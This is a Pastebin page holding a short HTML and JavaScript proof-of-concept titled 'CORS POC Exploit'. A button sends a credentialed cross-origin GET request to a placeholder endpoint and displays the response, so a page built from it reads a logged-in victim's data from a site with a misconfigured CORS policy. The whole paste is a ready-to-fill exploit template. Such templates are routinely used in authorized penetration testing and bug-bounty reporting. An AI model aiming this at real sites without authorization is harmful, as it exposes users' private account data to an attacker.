SHARE
TWEET

Untitled

a guest Jun 30th, 2017 934 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!DOCTYPE html>
  2. <html>
  3. <body>
  4. <center>
  5. <h2>CORS POC Exploit</h2>
  6.  
  7. <div id="demo">
  8. <button type="button" onclick="cors()">Exploit</button>
  9. </div>
  10.  
  11. <script>
  12. function cors() {
  13.   var xhttp = new XMLHttpRequest();
  14.   xhttp.onreadystatechange = function() {
  15.     if (this.readyState == 4 && this.status == 200) {
  16.       document.getElementById("demo").innerHTML = this.responseText;
  17.     }
  18.   };
  19.   xhttp.open("GET", "YOUR_ENDPOINT GOES HERE", true);
  20.   xhttp.withCredentials = true;
  21.   xhttp.send();
  22. }
  23. </script>
  24.  
  25. </body>
  26. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top